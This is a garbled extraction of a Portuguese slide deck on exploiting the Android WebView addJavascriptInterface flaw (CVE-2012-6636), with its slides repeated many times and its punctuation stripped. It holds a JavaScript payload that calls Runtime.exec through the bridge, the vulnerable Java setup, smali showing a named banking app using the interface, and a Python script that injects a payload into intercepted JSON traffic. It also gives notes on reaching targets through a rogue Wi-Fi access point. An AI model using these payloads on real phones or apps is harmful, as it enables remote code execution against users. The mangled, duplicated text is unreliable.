ltimg id=chupacabra onclick=goDown() width=212 height=50 title= alt= src=dataimagegifbase64 gt
Payload 1
Cruzar os dedos
Payload 2
CVE-2012-6636
ndash The Android API before 17 does not properly restrict the WebViewaddJavascriptInterface method
Afeta android lt 42 hellip em teoria
ndash Alguns 23X natildeo funciona
ndash Alguns 3X natildeo funciona 100 Around 70 of all Android devices in the field are subject to a
Javascript exploit that could allow an attacker remote access to your phone by doing nothing more than surfing to a malicious page or scanning in a malicious QR Code
ndash Bibliotecas de propaganda
Payload 2
Problemas na ponte javascript rarr java
ndash addJavascriptInterface( )
ltscriptgt function execute(args) return windowAttackgetClass()forName(javalangRuntime)getMethod(getRuntimenull)invoke(nullnull)exec(args)ltscriptgtltheadgtltbodygt
ltscriptgt execute([systembinsh-cecho -n JOKER gt datadatatestwebviewpwndtxt])ltscriptgt
WebSettings webSettings = browsergetSettings()webSettingssetJavaScriptEnabled(true)browseraddJavascriptInterface(new JsInvokeClass() Attack)
Payload 2
Android gt 42
ndash obriga JavascriptInterface method wise Estatiacutesticas
googleplay-api
ndash script para baixar os 100 mais populares aplicativos gratuiacutetos de todas as classes
2379 Apps baixados 922 tem addJavascript Interface 339 (14) natildeo tem anotaccedilatildeo JavascriptInterface
Payload 2
Payload 2
class public LbrcomgabbaCaixaCaixaWebViewActivity
super LandroidappActivityhellipconst-string v7 Android
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)Vhellipconst-string v7 HTMLOUT
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)V
Payload 3
Link changer
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload elif http in data[key] data[key] = httpwwwjokercombr else processJson(data[key])
Payload 3
Payload 3
Payload 3
Payload 3
Payload 3
Praticidade
Precisa
ndash estar perto do alvo (wifi range)
ndash ter sorte de achar algum probe dele ou ele gostar do seu AP
ndash Ter uma DB de aplicativos vulneraacuteveis e escanear os requests atraacutes de um
ndash ou
ndash Ser dedicado e fazer um recon do alvo antes ir para o lab e voltar com os apps que satildeo vulneraacuteveis
ndash Pegar o momento do request
Duacutevidas
GRATO POR ASSISTIR
- Slide 1
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
-
Payload 1
Cruzar os dedos
Payload 2
CVE-2012-6636
ndash The Android API before 17 does not properly restrict the WebViewaddJavascriptInterface method
Afeta android lt 42 hellip em teoria
ndash Alguns 23X natildeo funciona
ndash Alguns 3X natildeo funciona 100 Around 70 of all Android devices in the field are subject to a
Javascript exploit that could allow an attacker remote access to your phone by doing nothing more than surfing to a malicious page or scanning in a malicious QR Code
ndash Bibliotecas de propaganda
Payload 2
Problemas na ponte javascript rarr java
ndash addJavascriptInterface( )
ltscriptgt function execute(args) return windowAttackgetClass()forName(javalangRuntime)getMethod(getRuntimenull)invoke(nullnull)exec(args)ltscriptgtltheadgtltbodygt
ltscriptgt execute([systembinsh-cecho -n JOKER gt datadatatestwebviewpwndtxt])ltscriptgt
WebSettings webSettings = browsergetSettings()webSettingssetJavaScriptEnabled(true)browseraddJavascriptInterface(new JsInvokeClass() Attack)
Payload 2
Android gt 42
ndash obriga JavascriptInterface method wise Estatiacutesticas
googleplay-api
ndash script para baixar os 100 mais populares aplicativos gratuiacutetos de todas as classes
2379 Apps baixados 922 tem addJavascript Interface 339 (14) natildeo tem anotaccedilatildeo JavascriptInterface
Payload 2
Payload 2
class public LbrcomgabbaCaixaCaixaWebViewActivity
super LandroidappActivityhellipconst-string v7 Android
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)Vhellipconst-string v7 HTMLOUT
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)V
Payload 3
Link changer
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload elif http in data[key] data[key] = httpwwwjokercombr else processJson(data[key])
Payload 3
Payload 3
Payload 3
Payload 3
Payload 3
Praticidade
Precisa
ndash estar perto do alvo (wifi range)
ndash ter sorte de achar algum probe dele ou ele gostar do seu AP
ndash Ter uma DB de aplicativos vulneraacuteveis e escanear os requests atraacutes de um
ndash ou
ndash Ser dedicado e fazer um recon do alvo antes ir para o lab e voltar com os apps que satildeo vulneraacuteveis
ndash Pegar o momento do request
Duacutevidas
GRATO POR ASSISTIR
- Slide 1
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
-
Payload 2
CVE-2012-6636
ndash The Android API before 17 does not properly restrict the WebViewaddJavascriptInterface method
Afeta android lt 42 hellip em teoria
ndash Alguns 23X natildeo funciona
ndash Alguns 3X natildeo funciona 100 Around 70 of all Android devices in the field are subject to a
Javascript exploit that could allow an attacker remote access to your phone by doing nothing more than surfing to a malicious page or scanning in a malicious QR Code
ndash Bibliotecas de propaganda
Payload 2
Problemas na ponte javascript rarr java
ndash addJavascriptInterface( )
ltscriptgt function execute(args) return windowAttackgetClass()forName(javalangRuntime)getMethod(getRuntimenull)invoke(nullnull)exec(args)ltscriptgtltheadgtltbodygt
ltscriptgt execute([systembinsh-cecho -n JOKER gt datadatatestwebviewpwndtxt])ltscriptgt
WebSettings webSettings = browsergetSettings()webSettingssetJavaScriptEnabled(true)browseraddJavascriptInterface(new JsInvokeClass() Attack)
Payload 2
Android gt 42
ndash obriga JavascriptInterface method wise Estatiacutesticas
googleplay-api
ndash script para baixar os 100 mais populares aplicativos gratuiacutetos de todas as classes
2379 Apps baixados 922 tem addJavascript Interface 339 (14) natildeo tem anotaccedilatildeo JavascriptInterface
Payload 2
Payload 2
class public LbrcomgabbaCaixaCaixaWebViewActivity
super LandroidappActivityhellipconst-string v7 Android
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)Vhellipconst-string v7 HTMLOUT
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)V
Payload 3
Link changer
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload elif http in data[key] data[key] = httpwwwjokercombr else processJson(data[key])
Payload 3
Payload 3
Payload 3
Payload 3
Payload 3
Praticidade
Precisa
ndash estar perto do alvo (wifi range)
ndash ter sorte de achar algum probe dele ou ele gostar do seu AP
ndash Ter uma DB de aplicativos vulneraacuteveis e escanear os requests atraacutes de um
ndash ou
ndash Ser dedicado e fazer um recon do alvo antes ir para o lab e voltar com os apps que satildeo vulneraacuteveis
ndash Pegar o momento do request
Duacutevidas
GRATO POR ASSISTIR
- Slide 1
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
-
Payload 2
Problemas na ponte javascript rarr java
ndash addJavascriptInterface( )
ltscriptgt function execute(args) return windowAttackgetClass()forName(javalangRuntime)getMethod(getRuntimenull)invoke(nullnull)exec(args)ltscriptgtltheadgtltbodygt
ltscriptgt execute([systembinsh-cecho -n JOKER gt datadatatestwebviewpwndtxt])ltscriptgt
WebSettings webSettings = browsergetSettings()webSettingssetJavaScriptEnabled(true)browseraddJavascriptInterface(new JsInvokeClass() Attack)
Payload 2
Android gt 42
ndash obriga JavascriptInterface method wise Estatiacutesticas
googleplay-api
ndash script para baixar os 100 mais populares aplicativos gratuiacutetos de todas as classes
2379 Apps baixados 922 tem addJavascript Interface 339 (14) natildeo tem anotaccedilatildeo JavascriptInterface
Payload 2
Payload 2
class public LbrcomgabbaCaixaCaixaWebViewActivity
super LandroidappActivityhellipconst-string v7 Android
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)Vhellipconst-string v7 HTMLOUT
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)V
Payload 3
Link changer
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload elif http in data[key] data[key] = httpwwwjokercombr else processJson(data[key])
Payload 3
Payload 3
Payload 3
Payload 3
Payload 3
Praticidade
Precisa
ndash estar perto do alvo (wifi range)
ndash ter sorte de achar algum probe dele ou ele gostar do seu AP
ndash Ter uma DB de aplicativos vulneraacuteveis e escanear os requests atraacutes de um
ndash ou
ndash Ser dedicado e fazer um recon do alvo antes ir para o lab e voltar com os apps que satildeo vulneraacuteveis
ndash Pegar o momento do request
Duacutevidas
GRATO POR ASSISTIR
- Slide 1
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
-
Payload 2
Android gt 42
ndash obriga JavascriptInterface method wise Estatiacutesticas
googleplay-api
ndash script para baixar os 100 mais populares aplicativos gratuiacutetos de todas as classes
2379 Apps baixados 922 tem addJavascript Interface 339 (14) natildeo tem anotaccedilatildeo JavascriptInterface
Payload 2
Payload 2
class public LbrcomgabbaCaixaCaixaWebViewActivity
super LandroidappActivityhellipconst-string v7 Android
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)Vhellipconst-string v7 HTMLOUT
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)V
Payload 3
Link changer
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload elif http in data[key] data[key] = httpwwwjokercombr else processJson(data[key])
Payload 3
Payload 3
Payload 3
Payload 3
Payload 3
Praticidade
Precisa
ndash estar perto do alvo (wifi range)
ndash ter sorte de achar algum probe dele ou ele gostar do seu AP
ndash Ter uma DB de aplicativos vulneraacuteveis e escanear os requests atraacutes de um
ndash ou
ndash Ser dedicado e fazer um recon do alvo antes ir para o lab e voltar com os apps que satildeo vulneraacuteveis
ndash Pegar o momento do request
Duacutevidas
GRATO POR ASSISTIR
- Slide 1
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
-
Payload 2
Payload 2
class public LbrcomgabbaCaixaCaixaWebViewActivity
super LandroidappActivityhellipconst-string v7 Android
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)Vhellipconst-string v7 HTMLOUT
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)V
Payload 3
Link changer
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload elif http in data[key] data[key] = httpwwwjokercombr else processJson(data[key])
Payload 3
Payload 3
Payload 3
Payload 3
Payload 3
Praticidade
Precisa
ndash estar perto do alvo (wifi range)
ndash ter sorte de achar algum probe dele ou ele gostar do seu AP
ndash Ter uma DB de aplicativos vulneraacuteveis e escanear os requests atraacutes de um
ndash ou
ndash Ser dedicado e fazer um recon do alvo antes ir para o lab e voltar com os apps que satildeo vulneraacuteveis
ndash Pegar o momento do request
Duacutevidas
GRATO POR ASSISTIR
- Slide 1
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
-
Payload 2
class public LbrcomgabbaCaixaCaixaWebViewActivity
super LandroidappActivityhellipconst-string v7 Android
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)Vhellipconst-string v7 HTMLOUT
invoke-virtual v5 v6 v7 LandroidwebkitWebView-gtaddJavascriptInterface(LjavalangObjectLjavalangString)V
Payload 3
Link changer
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload elif http in data[key] data[key] = httpwwwjokercombr else processJson(data[key])
Payload 3
Payload 3
Payload 3
Payload 3
Payload 3
Praticidade
Precisa
ndash estar perto do alvo (wifi range)
ndash ter sorte de achar algum probe dele ou ele gostar do seu AP
ndash Ter uma DB de aplicativos vulneraacuteveis e escanear os requests atraacutes de um
ndash ou
ndash Ser dedicado e fazer um recon do alvo antes ir para o lab e voltar com os apps que satildeo vulneraacuteveis
ndash Pegar o momento do request
Duacutevidas
GRATO POR ASSISTIR
- Slide 1
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
-
Payload 3
Link changer
def processJson(data) if type(data) is list for m in data processJson(m) elif type(data) is dict for key in data if isinstance(data[key] unicode) if scanForHtmlTag(data[key]) data[key] = data[key] + payload elif http in data[key] data[key] = httpwwwjokercombr else processJson(data[key])
Payload 3
Payload 3
Payload 3
Payload 3
Payload 3
Praticidade
Precisa
ndash estar perto do alvo (wifi range)
ndash ter sorte de achar algum probe dele ou ele gostar do seu AP
ndash Ter uma DB de aplicativos vulneraacuteveis e escanear os requests atraacutes de um
ndash ou
ndash Ser dedicado e fazer um recon do alvo antes ir para o lab e voltar com os apps que satildeo vulneraacuteveis
ndash Pegar o momento do request
Duacutevidas
GRATO POR ASSISTIR
- Slide 1
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
-
Payload 3
Payload 3
Payload 3
Payload 3
Payload 3
Praticidade
Precisa
ndash estar perto do alvo (wifi range)
ndash ter sorte de achar algum probe dele ou ele gostar do seu AP
ndash Ter uma DB de aplicativos vulneraacuteveis e escanear os requests atraacutes de um
ndash ou
ndash Ser dedicado e fazer um recon do alvo antes ir para o lab e voltar com os apps que satildeo vulneraacuteveis
ndash Pegar o momento do request
Duacutevidas
GRATO POR ASSISTIR
- Slide 1
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
-
Payload 3
Payload 3
Payload 3
Payload 3
Praticidade
Precisa
ndash estar perto do alvo (wifi range)
ndash ter sorte de achar algum probe dele ou ele gostar do seu AP
ndash Ter uma DB de aplicativos vulneraacuteveis e escanear os requests atraacutes de um
ndash ou
ndash Ser dedicado e fazer um recon do alvo antes ir para o lab e voltar com os apps que satildeo vulneraacuteveis
ndash Pegar o momento do request
Duacutevidas
GRATO POR ASSISTIR
- Slide 1
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
-
Payload 3
Payload 3
Payload 3
Praticidade
Precisa
ndash estar perto do alvo (wifi range)
ndash ter sorte de achar algum probe dele ou ele gostar do seu AP
ndash Ter uma DB de aplicativos vulneraacuteveis e escanear os requests atraacutes de um
ndash ou
ndash Ser dedicado e fazer um recon do alvo antes ir para o lab e voltar com os apps que satildeo vulneraacuteveis
ndash Pegar o momento do request
Duacutevidas
GRATO POR ASSISTIR
- Slide 1
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
-
Payload 3
Payload 3
Praticidade
Precisa
ndash estar perto do alvo (wifi range)
ndash ter sorte de achar algum probe dele ou ele gostar do seu AP
ndash Ter uma DB de aplicativos vulneraacuteveis e escanear os requests atraacutes de um
ndash ou
ndash Ser dedicado e fazer um recon do alvo antes ir para o lab e voltar com os apps que satildeo vulneraacuteveis
ndash Pegar o momento do request
Duacutevidas
GRATO POR ASSISTIR
- Slide 1
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
-
Payload 3
Praticidade
Precisa
ndash estar perto do alvo (wifi range)
ndash ter sorte de achar algum probe dele ou ele gostar do seu AP
ndash Ter uma DB de aplicativos vulneraacuteveis e escanear os requests atraacutes de um
ndash ou
ndash Ser dedicado e fazer um recon do alvo antes ir para o lab e voltar com os apps que satildeo vulneraacuteveis
ndash Pegar o momento do request
Duacutevidas
GRATO POR ASSISTIR
- Slide 1
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
-
Praticidade
Precisa
ndash estar perto do alvo (wifi range)
ndash ter sorte de achar algum probe dele ou ele gostar do seu AP
ndash Ter uma DB de aplicativos vulneraacuteveis e escanear os requests atraacutes de um
ndash ou
ndash Ser dedicado e fazer um recon do alvo antes ir para o lab e voltar com os apps que satildeo vulneraacuteveis
ndash Pegar o momento do request
Duacutevidas
GRATO POR ASSISTIR
- Slide 1
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
-
Duacutevidas
GRATO POR ASSISTIR
- Slide 1
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
-